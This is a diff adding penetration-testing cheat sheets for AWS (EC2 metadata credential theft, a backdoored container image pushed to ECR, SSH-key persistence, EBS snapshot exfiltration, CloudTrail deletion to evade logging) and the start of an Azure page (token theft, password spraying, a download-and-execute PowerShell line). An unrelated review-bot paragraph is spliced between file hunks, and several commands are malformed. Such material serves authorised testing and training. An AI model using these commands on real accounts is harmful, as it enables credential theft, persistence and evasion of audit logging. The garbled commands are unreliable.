specific information about a node group in a cluster + +``` +aws eks describe-nodegroup --cluster-name name --nodegroup-name name +``` + +#### Listing Fargate in specified cluster + +``` +aws eks list-fargate-profiles --cluster-name cluster-name +``` + +#### Listing information about a fargate profile in a cluster + +``` +aws eks describe-fargate-profiles --cluster-name name --fargate-profile-name name +``` + +## Persistence + +* It's possible to modify an existing docker image with a backdoor, when this image is used it will trigger our team server. + +### Enumerating the user + +``` +aws sts get-caller-identity +``` + +### Listing manager policies attached to the IAM role + +``` +aws iam list-attached-role-policies --role-name name +``` + +### Getting information about the version of the managed policy + +``` +aws iam get-policy-version --policy-arn arn --version-id id +``` + +### Getting information about the repositories in container registry + +``` +aws ecr describe-repositories +``` + +### Listing all images in the repository + +``` +aws ecr list-images --repository-name name +``` + +### Listing information about an image + +``` +aws ecr describe-images --repository-name name --image-ids imageTag=Name +``` + +### Authenticate the docker daemon to ECR + +``` +aws ecr get-login-password --region region | docker login --username AWS --password-stdin ecr_address +``` + +### Building images with backdoor + +``` +docker build -t image_name +``` + +### Tagging the docker image + +``` +docker tag image_name ecr_addr:Image_Name +``` + +### Pushing the image to ECR + +``` +docker push ecr_addr:Image_Name +``` + +## EC2 + +* AMI, images used to create virtual machines +* It's possible to create a malicious image to compromise users +* We can access an instance using SSH Keys, EC2 Instance Connect, Session Manager +* The SSH Key method is permanent, we need to gather the private key to connect to the instance +* EC2 Instance connect is an IAM right that we can add to a 
user, enabling us to temporarily connect to an instance +* Session manager only work in browser and it does not need SSH Key +* Windows machines can be accessed by using RDP, Session Manager +* Security Groups acts as a virtual firewall to control inbound and outbound traffic, acts at the instance level, not the subnet level. + +## Enumeration + +### Listing information about all instances + +``` +aws ec2 describe-instances +``` + +### Listing information about a specific region + +``` +aws ec2 describe-instances --region region +``` + +### Listing information about specific instance + +``` +aws ec2 describe-instances --instance-ids ID +``` + +### Extracting UserData attribute of specified instance + +``` +aws ec2 describe-instance-attribute --attribute userData --instance-id instanceID +``` + +*This command gathers the metadata from the instance, like commands or secrets. The output is base64 encoded* + +### Listing roles of an instance + +``` +aws ec2 describe-iam-instance-profile-associations +``` + +## Exploitation +* Initial access can happen by RCE or SSRF +* Metadata can be used to exfiltrate information from the instance + +### Remote code execution + +#### AWS Metadata +If we have remote code execution or SSRF, we can grab metadata information + +``` +curl http://169.254.169.254/latest/meta-data +``` + +##### Grabbing the keys to access the instance + +``` +curl http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance +``` + +##### Grabbing the keys in metadata version 2 + +```bash +TOKEN=`curl +X PUT "http://169.254.169.254/latest/ api /token" H "X-aws-ec2-metadata-token-ttl-seconds: 21600"` +&& curl H "X-aws-ec2-metadata-token: $TOKEN" v http://169.254.169.254/latest/meta-data/ +``` + +#### AWS Userdata + +Version 1 + +``` +curl http://169.254.169.254/latest/user-data/ +``` + +Version 2 + +```bash +TOKEN=`curl +X PUT "http://169.254.169.254/latest/ api /token" H "X-aws-ec2-metadata-token-ttl-seconds: 21600"` +&& 
curl H "X-aws-ec2-metadata-token: $TOKEN" v http://169.254.169.254/latest/user-data/ +``` + +### Privilege Escalation +* One approach to get a shell in a instance is to put a reverse shell in UserData attribute, when the instance is launched, we will have the connection. +* Another approach happens when we have the iam:PassRole and iam:AmazonEC2FullAccess permissions, we can add an administrator role to the compromised EC2 instance and access aws services. + +#### Getting information about the key + +``` +aws sts get-caller-identity +``` + +#### Getting policies attached to the IAM user + +``` +aws iam list-attached-user-policies --user-name user_name +``` + +#### Getting information about a specific policy version + +``` +aws iam get-policy-version --policy-arn ARN --version-id ID +``` + +To attach a role to an EC2 instance, we can use the RCE to grab the ID + +``` +curl http://169.254.169.254/latest/meta-data/instance-id +``` + +#### Listing instance profiles + +``` +aws iam list-instance-profiles +``` + +#### Attach an instance profile to an EC2 instance + +``` +aws ec2 associate-iam-instance-profile --instance-id ID --iam-instance-profile Name=ProfileName +``` + +### Credential Access + +* We can grab the credentials by abusing metadata (Web Application with SSRF,RCE and so on) + +#### After the initial access +1. Enumerate the key (Role) + +``` +aws sts get-caller-identity +``` + +2. If there are roles associated with the key, we can grab the credentials by issuing a request to the metadata endpoint (v1 or v2) + +``` +curl http://169.254.169.254/latest/meta-data/iam/security-credentials/ROLE_OF_PREVIOUS_COMMAND +``` + +3. Configure the aws cli + +``` +aws configure +``` + +Or use enviroment variables. + +### Persistence +* All the persistence techniques works here, SSH persistence, vim backdoor and so on. + +#### SSH Persistence example + +1. Generate SSH Key pair + +``` +ssh-keygen +``` + +2. 
Add public key to authorized_keys + +``` +echo "PUBLIC_Key" >> /home/user/.ssh/authorized_keys +``` + +3. Use the private key to connect + +``` +ssh -i public_key user@instance +``` + +# Elastic Block Store +* Block storage system used to store persistent data +* It's possible to attach this drive to EC2 and increase the storage (Like and HD, but scalable). +* It's possible to create a snapshot (It will be saved on S3) and create a volume from this snapshot. +* It's possible to attach the snapshot (Backup of BS) to an EC2 instance +* Snapshots can be used as volumes or AMI's + +## Enumeration + +### Enumerating EBS volumes + +``` +aws ec2 describe-volumes +``` + +* If the volume is available, it can be attached to an EC2 instance +* Check if the EBS is encrypted + +### Enumerating Snapshots + +``` +aws ec2 describe-snapshots --owner-ids self +``` + +* Also check if the snapshot is encrypted + +## Exploitation & Data Exfiltration +* Create a snapshot of an EC2 instance, create a volume from snapshot and attach to other EC2 instance. +* User need to have IAM permissions on EC2 +* Maybe we don't have the right to access the instance but have rights to create a snapshot and attach it to another machine. + +### Creating a snapshot of a specified volume + +``` +aws ec2 create-snapshot --volume volumeID --description "Example" --profile profile_name +``` + +### Listing snapshots + +``` +aws ec2 describe-snapshots +``` + +### Creating a volume from a snasphot + +``` +aws ec2 create-volume --snapshot-id ID --availability-zone ZONE --profile profile_name +``` + +* The volume needs to be in the same availability zone as the instance we have access + +### Attaching the volume to an instance + +``` +aws ec2 attach-volume --volume-id VolumeID --instance-id InstanceID --device /dev/sdfd -> Can be other value +``` + +### Mounting the volume + +``` +sudo mount /dev/sdfd /directory +``` + +After mounting, we will have access to the disk. 
+ +# RDS - Relational Database Service + +* Service to use, operate and scale relational databases in AWS (MariaDB, MySQL and similar) +* The access is done by using password, password+IAM or password+kerberos +* It's possible to restrict access using restriction such as specific EC2 or lambda or use network level restriction such as vpc, ip. +* RDS Proxy hadles the traffic between the application and the database, it enables the enforcing of IAM permissions and use secrets manager to store credentials. + +## Enumeration + +### Listing information about clusters in RDS + +``` +aws rds describe-db-clusters +``` + +### Listing information about RDS instances + +``` +aws rds describe-db-instances +``` + +* IAMDatabaseAuthenticationEnabled: false -> Need password to access the instance + +### Listing information about subnet groups in RDS + +``` +aws rds describe-db-subnet-groups +``` + +### Listing information about database security groups in RDS + +``` +aws rds describe-db-security-groups +``` + +### Listing information about database proxies + +``` +aws rds describe-db-proxies +``` + +## Data exfiltration + +* If the instance is in a security group or VPC, we need to compromise it first to access the database (For example, we compromise an EC2 instance in the same VPC, then its possible to connect) + +### List instances in RDS + +``` +aws rds describe-db-instances +``` + +### List information about the specified security group + +``` +aws ec2 describe-security-groups --group-ids id +``` + +### Password based authentication + +``` +mysql -h hostname -u name -P port -p password +``` + +### IAM Based authentication + +**1. Identify the user** + +``` +aws sts get-caller-identity +``` + +**2. List all policies attached to a role** + +``` +aws iam list-attached-role-policies --role-name name +``` + +**3. Get information about a specific version of a policy** + +``` +aws iam get-policy-version --policy-arn arn --version-id ID +``` + +**4. 
Get a temporary token from the RDS** + +``` +aws rds generate-db-auth-token --hostname hostname --port port --username username --region region +``` + +* To be easier, we can put it in a variable + +``` +TOKEN=$(aws rds generate-db-auth-token --hostname hostname --port port --username username --region region) +``` + +**5. Connect to the DB using the token** + +``` +mysql -h hostname -u name -P port --enable-cleartext-plugin --user=user --password=$TOKEN +``` + +## SSO & Other Services + +## Single Sign On (SSO) + +* Used to centrally manage access to multiple AWS accounts and applications. +* Provide users a way to interact with all services and applications through one place +* Can be used to manage access and user permissions to all AWS accounts +* The identity source can use AWS SSO's identity store or external identity store (Okta,SAML and similar) + +## CloudTrail + +* Log monitoring service, allow us to continuously monitor and retain account activity related to actions in our AWS account +* Provide event history of AWS account activity, SDKs, command line tools and other services +* Commonly used to detect unsual behavior in AWS account +* Pacu automatically changes the user agent to deceive the logs of cloudtrail + +### Userful Commands + +#### List trails + +``` +aws cloudtrail list-trails +``` + +#### Disabling CloudTrail + +``` +aws cloudtrail delete-trail --name example_trail --profile name +``` + +#### Disable monitoring of events from global events + +``` +aws cloudtrail update-trail --name example_trail --no-include-global-service-event +``` + +#### Disable CloudTrail on specific regions + +``` +aws cloudtrail update-trail --name example_trail --no-include-global-service-event --no-is-multi-region --region=eu-west +``` + +## AWS Shield + +* Used to protect services from Denial of Service Attacks +* There are 2 versions, the standard and the Advanced + +## AWS Waf + +* Used to protect applications against common web application attacks +* Common WAF 
bypasses can be tested against it +* To detect an WAF, we can use `wafw00f` + +## AWS Inspector + +* Automated security assessment service that helps improve the security and compliance of applications on AWS +* Works with an agent + +## AWS Guard Duty + +* Threat detection service that monitors for malicious activity and unauthorized behavior +* Works by collecting and analyzing logs + +## Virtual Private Cloud + +* Used to create an isolated infrastructure within the cloud, including subnets and so on. +* If the VPC has an internet gateway, means its a public subnet +* Every VPC can have Network ACL's + +## Routing Tables + +A set of rules to determine where the traffic will be directed, comes in form of Destination and Target, defined as follows + +``` +DESTINATION TARGET + +IP local -> VPC Internal +IP igw -> Internet Gateway +IP nat -> NAT Gateway +IP pcx -> VPC Peering +IP vpce -> VPC Endpoint +IP vgw -> VPN Gateway +IP eni -> Network Interface +``` + +* VPC Internal -> Internal IP, no internet connection +* Internet Gateway -> Used to access the internet +* NAT Gateway -> Does the NAT between machines, allows one way connection to the internet +* VPC Peering -> Allows the communication between 2 VPC's +* VPC Endpoint -> Used to access aws services without internet connection (Internet Gateway) +* VPN Gateway -> Used to expand the cloud to on premises and vice-versa +* Network Interface -> Network Interfaces + +## Enumeration + +### Listing VPC's + +``` +aws ec2 describe-vpcs +``` + +### Listing VPC's specifing the region + +``` +aws ec2 describe-vpcs --region us-west-1 +``` + +### Listing VPC information by ID + +``` +aws ec2 describe-vpcs --filters "Name=vpc-id,Values=ID" +``` + +### Listing subnet's + +``` +aws ec2 describe-subnets +``` + +### Listing subnet's by VPC-id + +``` +aws ec2 describe-subnets --filters "Name=vpc-id,Values=ID" +``` + +### Listing routing tables + +``` +aws ec2 describe-route-tables +``` + +### Listing routing tables by VPC-id + 
+``` +aws ec2 describe-route-tables --filters "Name=vpc-id,Values=ID" +``` + +### Listing Network ACL's + +``` +aws ec2 describe-network-acls +``` + +## Lateral Movement and Pivoting + +* We can abuse VPC peering to do lateral movement + +### Scenario + +* There are 3 VPC's -> A,B,C +* A can access B through peering and B access C. We can use VPC B as a peering pivot to access VPC C from VPC A. +* The lateral movement can be done if we gather keys or other machines +* Always enumerate the subnets to see in which subnet we can access other VPC's + +#### Listing VPC peering connections + +``` +aws ec2 describe-vpc-peering-connections +``` + +#### Listing subnets of specific VPC (Important because the access can be restricted to specific subnets to other VPC's) + +``` +aws ec2 describe-subnets --filters "Name=vpc-id,Values=ID" +``` + +#### Listing routing tables + +``` +aws ec2 describe-route-tables --filters "Name=vpc-id,Values=ID" +``` + +#### Listing instances on the specified VPC ID + +``` +aws ec2 describe-instances --filters "Name=vpc-id,Values=ID" +``` + +#### Listing instances on the specified subnet + +``` +aws ec2 describe-instances --filters "Name=subnet-id,Values=ID" +``` + +## References + +* [An introduction to penetration testing AWS - Akimbocore](https://akimbocore.com/article/introduction-to-penetration-testing-aws/) +* [Cloud Shadow Admin Threat 10 Permissions Protect - CyberArk](https://www.cyberark.com/threat-research-blog/cloud-shadow-admin-threat-10-permissions-protect/) +* [My arsenal of AWS Security tools - toniblyx](https://github.com/toniblyx/my-arsenal-of-aws-security-tools) +* [AWS Privilege Escalation method mitigation - RhinoSecurityLabs](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/) +* [AWS CLI Cheatsheet - apolloclark](https://gist.github.com/apolloclark/b3f60c1f68aa972d324b) +* [Pacu Open source AWS Exploitation framework - 
RhinoSecurityLabs](https://rhinosecuritylabs.com/aws/pacu-open-source-aws-exploitation-framework/) +* [PACU Spencer Gietzen - 30 juil. 2018](https://www.youtube.com/watch?v=XfetW1Vqybw&feature=youtu.be&list=PLBID4NiuWSmfdWCmYGDQtlPABFHN7HyD5) +* [Cloud security instance metadata - PumaScan](https://pumascan.com/resources/cloud-security-instance-metadata/) +* [Privilege escalation in the Cloud: From SSRF to Global Account Administrator - Maxime Leblanc - Sep 1, 2018](https://medium.com/poka-techblog/privilege-escalation-in-the-cloud-from-ssrf-to-global-account-administrator-fd943cf5a2f6) +* [AWS - Cheatsheet - @Magnussen](https://www.magnussen.funcmylife.fr/article_35) +* [HOW I HACKED A WHOLE EC2 NETWORK DURING A PENETRATION TEST - by Federico Fernandez](https://www.secsignal.org/en/news/how-i-hacked-a-whole-ec2-network-during-a-penetration-test/) +* [How to Attach and Mount an EBS volume to EC2 Linux Instance - AUGUST 17, 2016](https://devopscube.com/mount-ebs-volume-ec2-instance/) +* [Getting shell and data access in AWS by chaining vulnerabilities - Riyaz Walikar - Aug 29, 2019 ](https://blog.appsecco.com/getting-shell-and-data-access-in-aws-by-chaining-vulnerabilities-7630fa57c7ed) +* [Getting started with Version 2 of AWS EC2 Instance Metadata service (IMDSv2) - Sunesh Govindaraj - Nov 25, 2019](https://blog.appsecco.com/getting-started-with-version-2-of-aws-ec2-instance-metadata-service-imdsv2-2ad03a1f3650) +* [Gaining AWS Console Access via API Keys - Ian Williams - March 18th, 2020](https://blog.netspi.com/gaining-aws-console-access-via-api-keys/) +* [AWS API calls that return credentials - kmcquade](https://gist.github.com/kmcquade/33860a617e651104d243c324ddf7992a) +* [A short note on AWS KEY ID - Tal Be'ery - Oct 27, 2023](https://medium.com/@TalBeerySec/a-short-note-on-aws-key-id-f88cc4317489) \ No newline at end of file diff --git a/docs/cloud/aws/todo.md b/docs/cloud/aws/todo.md new file mode 100644 index 0000000..30404ce --- /dev/null 
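Review bot: the two IMDSv2 examples under "Grabbing the keys in metadata version 2" and "AWS Userdata / Version 2" are not runnable as written: the curl flags have lost their dashes (`+X`, `H`, `v`), the token URL contains spaces (`/latest/ api /token`), and the backtick substitution is broken across two lines by a leading `&&`. Suggest `TOKEN=$(curl -s -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")` followed on its own line by `curl -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/meta-data/`. A few other commands in this file will also fail verbatim: step 3 of "SSH Persistence example" passes the public key to `-i`, which expects the private key; `aws ec2 create-snapshot --volume volumeID` should use `--volume-id`; the `attach-volume` line carries the comment `-> Can be other value` inside the fenced command; and the CloudTrail examples use `--no-include-global-service-event` and `--no-is-multi-region` where the CLI options are `--no-include-global-service-events` and `--no-is-multi-region-trail`, with `--region=eu-west` not being a valid region name (for example `eu-west-1`). Under "Disabling CloudTrail", `delete-trail` deletes the trail rather than disabling it; `aws cloudtrail stop-logging --name example_trail` is the non-destructive equivalent, so the heading should say which is meant. In the MySQL client lines, `-p password` with a space is read as `-p` (prompt) plus a database named `password`; use `-p` alone or `-ppassword`. The IAM example also names the user twice (`-u name` and `--user=user`) and should add `--ssl-mode=REQUIRED` (or `--ssl-ca`), because RDS IAM database authentication only works over TLS. Spelling: "snasphot", "hadles", "enviroment", "Userful", "unsual", "specifing".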
+++ b/docs/cloud/aws/todo.md @@ -0,0 +1 @@ +TODO \ No newline at end of file diff --git a/docs/cloud/azure/Cloud - Azure Pentest.md b/docs/cloud/azure/Cloud - Azure Pentest.md new file mode 100644 index 0000000..d7772aa --- /dev/null +++ b/docs/cloud/azure/Cloud - Azure Pentest.md 
@@ -0,0 +1,1230 @@ +# Cloud - Azure + +## Summary + +* [Azure Recon Tools](#azure-recon-tools) +* [Authenticating to the Microsoft Graph API in PowerShell](#authenticating-to-the-microsoft-graph-api-in-powershell) + * [Graph API Refresh Token](#graph-api-refresh-token) + * [Graph API Access Token](#graph-api-access-token) +* [Terminology](#terminology) +* [Training](#training) +* [Enumeration](#enumeration) + * [Enumerate valid emails](#enumerate-valid-emails) + * [Enumerate Azure Subdomains](#enumerate-azure-subdomains) + * [Enumerate tenant with Azure AD Powershell](#enumerate-tenant-with-azure-ad-powershell) + * [Enumerate tenant with Az Powershell](#enumerate-tenant-with-az-powershell) + * [Enumerate tenant with az cli](#enumerate-tenant-with-az-cli) + * [Enumerate manually](#enumerate-manually) + * [Enumeration methodology](#enumeration-methodology) +* [Phishing with Evilginx2](#phishing-with-evilginx2) +* [Illicit Consent Grant](#illicit-consent-grant) + * [Register Application](#register-application) + * [Configure Application](#configure-application) + * [Setup 365-Stealer (Deprecated)](#setup-365-stealer-deprecated) + * [Setup Vajra](#setup-vajra) +* [Device Code Phish](#device-code-phish) +* [Token from Managed Identity](#token-from-managed-identity) + * [Azure API via Powershell](#azure-api-via-powershell) + * [Azure API via Python Version](#azure-api-via-python-version) + * [Get Tokens](#get-tokens) + * [Use Tokens](#use-tokens) + * [Refresh Tokens](#refresh-token) +* [Stealing Tokens](#stealing-tokens) + * [Stealing tokens from az cli](#stealing-tokens-from-az-cli) + * [Stealing tokens from az powershell](#stealing-tokens-from-az-powershell) +* [Add Credentials to All Enterprise Applications](#add-credentials-to-all-enterprise-applications) +* [Spawn SSH for Azure Web App](#spawn-ssh-for-azure-web-app) +* [Azure Storage Blob](#azure-storage-blob) + * [Enumerate blobs](#enumerate-blobs) + * [SAS URL](#sas-url) + * [List and download 
blobs](#list-and-download-blobs) +* [Runbook Automation](#runbook-automation) + * [Create a Runbook](#create-a-runbook) + * [Persistence via Automation accounts](#persistence-via-automation-accounts) +* [Virtual Machine RunCommand](#virtual-machine-runcommand) +* [KeyVault Secrets](#keyvault-secrets) +* [Pass The Certificate](#pass--the-certificate) +* [Pass The PRT](#pass-the-prt) +* [Intunes Administration](#intunes-administration) +* [Dynamic Group Membership](#dynamic-group-membership) +* [Administrative Unit](#administrative-unit) +* [Deployment Template](#deployment-template) +* [Application Proxy](#application-proxy) +* [Conditional Access](#conditional-access) +* [Azure AD](#azure-ad) + * [Azure AD vs Active Directory](#azure-ad-vs-active-directory) + * [Password Spray](#password-spray) + * [Convert GUID to SID](#convert-guid-to-sid) +* [Azure AD Connect](#azure-ad-connect) + * [Azure AD Connect - Password extraction](#azure-ad-connect---password-extraction) + * [Azure AD Connect - MSOL Account's password and DCSync](#azure-ad-connect---msol-accounts-password-and-dcsync) + * [Azure AD Connect - Seamless Single Sign On Silver Ticket](#azure-ad-connect---seamless-single-sign-on-silver-ticket) +* [References](#references) + +## Azure Recon Tools + +* [**BloodHoundAD/AzureHound**](https://github.com/BloodHoundAD/AzureHound) - Azure Data Exporter for BloodHound + ```powershell + # First, retrieve a refresh token (-r) if username/password isn't supported. + # An access token (-j) isn't recommended because it can expire before the end of azurehound execution + Install-Module AADInternals -Scope CurrentUser + Import-Module AADInternals + $rt = (Get-AADIntAccessToken -ClientId "1950a258-227b-4e31-a9cf-717495945fc2" -Resource "https://graph.microsoft.com" -PRTToken (Get-AADIntUserPRTToken) -IncludeRefreshToken $true)[1] + + # Second, launch azurehound collector + ./azurehound -r "0.AXMAMe..." list --tenant "753a0bc5-..." 
-o output.json + + ## Connects on your Azure account using the refresh token provided and the tenant of the account + ## and collects every possible objects in contoso.microsoft.com. Results are stored in json + ./azurehound -r $rt --tenant "contoso.onmicrosoft.com" list -o azurehound-scan.json --tenant "contoso.microsoft.com" + ## Sets configuration file with connection variables and other things (not required) + ./azurehound configure + ## Collects every objects on all accessible tenants using username/password and prints it to stdout + ./azurehound -u "MattNelson@contoso.onmicrosoft.com" -p "MyVerySecurePassword123" --tenant "contoso.onmicrosoft.com" list + ## Collects every objects on a specific tenant using username/password and stores it in json + ./azurehound -u "phisheduser@contoso.onmicrosoft.com" -p "Password1" list -o initial-scan.json --tenant "contoso.onmicrosoft.com" + ## Collects every objects on all tenants accessible using Service Principal secret + ./azurehound -a "6b5adee8-..." -s "" --tenant "contoso.onmicrosoft.com" list + ## Collects AzureAD info (all except AzureRM info) using JWT access token + ./azurehound -j "ey..." --tenant "contoso.onmicrosoft.com" list az-ad + ## Collects every users using refresh token + ./azurehound -r "0.ARwA6Wg..." --tenant "contoso.onmicrosoft.com" list users + + # List of collections + az-ad: Collect all information available at the AzureAD tenant level. In most tenants, all users have the ability to read all this information by default. + az-rm: Collect all information available at the AzureRM subscription level. Users do not by default have read access to any of this information. + + apps: Collects AzureAD application registration objects. + devices: Collects AzureAD devices regardless of join type. + groups: Collects AzureAD security-enabled groups, both role eligible and non role eligible. + key-vaults: Collects AzureRM key vaults. 
+ management-groups: Collects AzureRM management group objects + resource-groups: Collects AzureRM resource group objects + roles: Collects AzureAD admin role objects + service-principals: Collects AzureAD service principals + subscriptions: Collevts AzureRM subscriptions + tenants: Collevts AzureAD tenant objects + users: Collects AzureAD users, including any guest users in the target tenant. + virtual-machines: Collects AzureRM virtual machines + + # GUI access + bolt://localhost:7687 + Username: neo4j + Password: BloodHound + + # Custom Queries : https://hausec.com/2020/11/23/azurehound-cypher-cheatsheet/ + # Cypher query examples: + MATCH p = (n)-[r]->(g:AZKeyVault) RETURN p + MATCH (n) WHERE n.azname IS NOT NULL AND n.azname <> "" AND n.name IS NULL SET n.name = n.azname + ``` +* [**BloodHoundAD/BARK**](https://github.com/BloodHoundAD/BARK) - BloodHound Attack Research Kit + ```ps1 + . .\BARK.ps1 + $MyRefreshTokenRequest = Get-AZRefreshTokenWithUsernamePassword -username "user@contoso.onmicrosoft.com" -password "MyVeryCoolPassword" -TenantID "contoso.onmicrosoft.com" + $MyMSGraphToken = Get-MSGraphTokenWithRefreshToken -RefreshToken $MyRefreshTokenRequest.refresh_token -TenantID "contoso.onmicrosoft.com" + $MyAADUsers = Get-AllAzureADUsers -Token $MyMSGraphToken.access_token -ShowProgress + ``` +* [**ROADTool**](https://github.com/dirkjanm/ROADtools) - The Azure AD exploration framework. 
+ ```powershell + pipenv shell + roadrecon auth [-h] [-u USERNAME] [-p PASSWORD] [-t TENANT] [-c CLIENT] [--as-app] [--device-code] [--access-token ACCESS_TOKEN] [--refresh-token REFRESH_TOKEN] [-f TOKENFILE] [--tokens-stdout] + roadrecon gather [-h] [-d DATABASE] [-f TOKENFILE] [--tokens-stdin] [--mfa] + roadrecon auth -u test@.onmicrosoft.com -p + roadrecon gather + roadrecon gui + ``` +* [**Azure/StormSpotter**](https://github.com/Azure/Stormspotter) - Azure Red Team tool for graphing Azure and Azure Active Directory objects + ```powershell + # session 1 - backend + pipenv shell + python ssbackend.pyz + + # session 2 - frontend + cd C:\Tools\stormspotter\frontend\dist\spa\ + quasar.cmd serve -p 9091 --history + + # session 3 - collector + pipenv shell + az login -u test@.onmicrosoft.com -p + python C:\Tools\stormspotter\stormcollector\sscollector.pyz cli + + # Web access on http://localhost:9091 + Username: neo4j + Password: BloodHound + Server: bolt://localhost:7687 + ``` +* [**Microsoft Portals**](https://msportals.io/) - Microsoft Administrator Sites +* [**nccgroup/Azucar**](https://github.com/nccgroup/azucar.git) : Azucar automatically gathers a variety of configuration data and analyses all data relating to a particular subscription in order to determine security risks. + ```powershell + # You should use an account with at least read-permission on the assets you want to access + PS> Get-ChildItem -Recurse c:\Azucar_V10 | Unblock-File + PS> .\Azucar.ps1 -AuthMode UseCachedCredentials -Verbose -WriteLog -Debug -ExportTo PRINT + PS> .\Azucar.ps1 -ExportTo CSV,JSON,XML,EXCEL -AuthMode Certificate_Credentials -Certificate C:\AzucarTest\server.pfx -ApplicationId 00000000-0000-0000-0000-000000000000 -TenantID 00000000-0000-0000-0000-000000000000 + PS> .\Azucar.ps1 -ExportTo CSV,JSON,XML,EXCEL -AuthMode Certificate_Credentials -Certificate C:\AzucarTest\server.pfx -CertFilePassword MySuperP@ssw0rd! 
-ApplicationId 00000000-0000-0000-0000-000000000000 -TenantID 00000000-0000-0000-0000-000000000000 + # resolve the TenantID for an specific username + PS> .\Azucar.ps1 -ResolveTenantUserName user@company.com + ``` +* [**FSecureLABS/Azurite Explorer**](https://github.com/FSecureLABS/Azurite) and **Azurite Visualizer** : Enumeration and reconnaissance activities in the Microsoft Azure Cloud. + ```powershell + git submodule init + git submodule update + PS> Import-Module AzureRM + PS> Import-Module AzuriteExplorer.ps1 + PS> Review-AzureRmSubscription + PS> Review-CustomAzureRmSubscription + ``` +* [**NetSPI/MicroBurst**](https://github.com/NetSPI/MicroBurst) - MicroBurst includes functions and scripts that support Azure Services discovery, weak configuration auditing, and post exploitation actions such as credential dumping + ```powershell + PS C:> Import-Module .\MicroBurst.psm1 + PS C:> Import-Module .\Get-AzureDomainInfo.ps1 + PS C:> Get-AzureDomainInfo -folder MicroBurst -Verbose + ``` +* [**cyberark/SkyArk**](https://github.com/cyberark/SkyArk) - Discover the most privileged users in the scanned Azure environment - including the Azure Shadow Admins. + Require: + - Read-Only permissions over Azure Directory (Tenant) + - Read-Only permissions over Subscription + - Require AZ and AzureAD module or administrator right + + ```powershell + $ powershell -ExecutionPolicy Bypass -NoProfile + PS C> Import-Module .\SkyArk.ps1 -force + PS C> Start-AzureStealth + PS C> IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cyberark/SkyArk/master/AzureStealth/AzureStealth.ps1') + PS C> Scan-AzureAdmins +* [**hausec/PowerZure**](https://github.com/hausec/PowerZure) - PowerShell framework to assess Azure security + ```powershell + # Require az module ! 
+ $ ipmo .\PowerZure + $ Set-Subscription -Id [idgoeshere] + + # Reader + $ Get-Runbook, Get-AllUsers, Get-Apps, Get-Resources, Get-WebApps, Get-WebAppDetails + + # Contributor + $ Execute-Command -OS Windows -VM Win10Test -ResourceGroup Test-RG -Command "whoami" + $ Execute-MSBuild -VM Win10Test -ResourceGroup Test-RG -File "build.xml" + $ Get-AllSecrets # AllAppSecrets, AllKeyVaultContents + $ Get-AvailableVMDisks, Get-VMDisk # Download a virtual machine's disk + + # Owner + $ Set-Role -Role Contributor -User test@contoso.com -Resource Win10VMTest + + # Administrator + $ Create-Backdoor, Execute-Backdoor + ``` +* [**dafthack/GraphRunner**](https://github.com/dafthack/GraphRunner) - A Post-exploitation Toolset for Interacting with the Microsoft Graph API + +## Authenticating to the Microsoft Graph API in PowerShell + +* [Microsoft Applications ID](https://learn.microsoft.com/fr-fr/troubleshoot/azure/active-directory/verify-first-party-apps-sign-in) + +| Name | GUID | +|----------------------------|--------------------------------------| +| Microsoft Azure PowerShell | 1950a258-227b-4e31-a9cf-717495945fc2 | +| Microsoft Azure CLI | 04b07795-8ddb-461a-bbee-02f9e1bf7b46 | +| Portail Azure | c44b4083-3bb0-49c1-b47d-974e53cbdf3c | + + +### Graph API Refresh Token + +Authenticating to the Microsoft Graph API in PowerShell + +```ps1 +$body = @{ + "client_id" = "1950a258-227b-4e31-a9cf-717495945fc2" + "resource" = "https://graph.microsoft.com" # Microsoft Graph API +} +$UserAgent = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36" +$Headers=@{} +$Headers["User-Agent"] = $UserAgent +$authResponse = Invoke-RestMethod ` + -UseBasicParsing ` + -Method Post ` + -Uri "https://login.microsoftonline.com/common/oauth2/devicecode?api-version=1.0" ` + -Headers $Headers ` + -Body $body +$authResponse +``` + +### Graph API Access Token + +This request require getting the Refresh Token. 
+ +```ps1 +$body=@{ + "client_id" = "1950a258-227b-4e31-a9cf-717495945fc2" + "grant_type" = "urn:ietf:params:oauth:grant-type:device_code" + "code" = $authResponse.device_code +} +$Tokens = Invoke-RestMethod ` + -UseBasicParsing ` + -Method Post ` + -Uri "https://login.microsoftonline.com/Common/oauth2/token?api-version=1.0" ` + -Headers $Headers ` + -Body $body +$Tokens +``` + + + +## Terminology + +> Basic Azure AD terminologies + +* **Tenant**: An instance of Azure AD and represents a single organization. +* **Azure AD Directory**: Each tenant has a dedicated Directory. This is used to perform identity and access management functions for resources. +* **Subscriptions**: It is used to pay for services. There can be multiple subscriptions in a Directory. +* **Core Domain**: The initial domain name .onmicrosoft.com is the core domain. It is possible to define custom domain names too. + + +## Training + +* AzureGoat : A Damn Vulnerable Azure Infrastructure - https://github.com/ine-labs/AzureGoat + + +## Enumeration + +### Enumerate valid emails + +> By default, O365 has a lockout policy of 10 tries, and it will lock out an account for one (1) minute. + +* Validate email + ```powershell + PS> C:\Python27\python.exe C:\Tools\o365creeper\o365creeper.py -f C:\Tools\emails.txt -o C:\Tools\validemails.txt + admin@.onmicrosoft.com - VALID + root@.onmicrosoft.com - INVALID + test@.onmicrosoft.com - VALID + contact@.onmicrosoft.com - INVALID + ``` +* Extract email lists with a valid credentials : https://github.com/nyxgeek/o365recon + +#### Password spraying + +```powershell +PS> . C:\Tools\MSOLSpray\MSOLSpray.ps1 +PS> Invoke-MSOLSpray -UserList C:\Tools\validemails.txt -Password -Verbose +``` + +### Enumerate Azure Subdomains + +```powershell +PS> . 
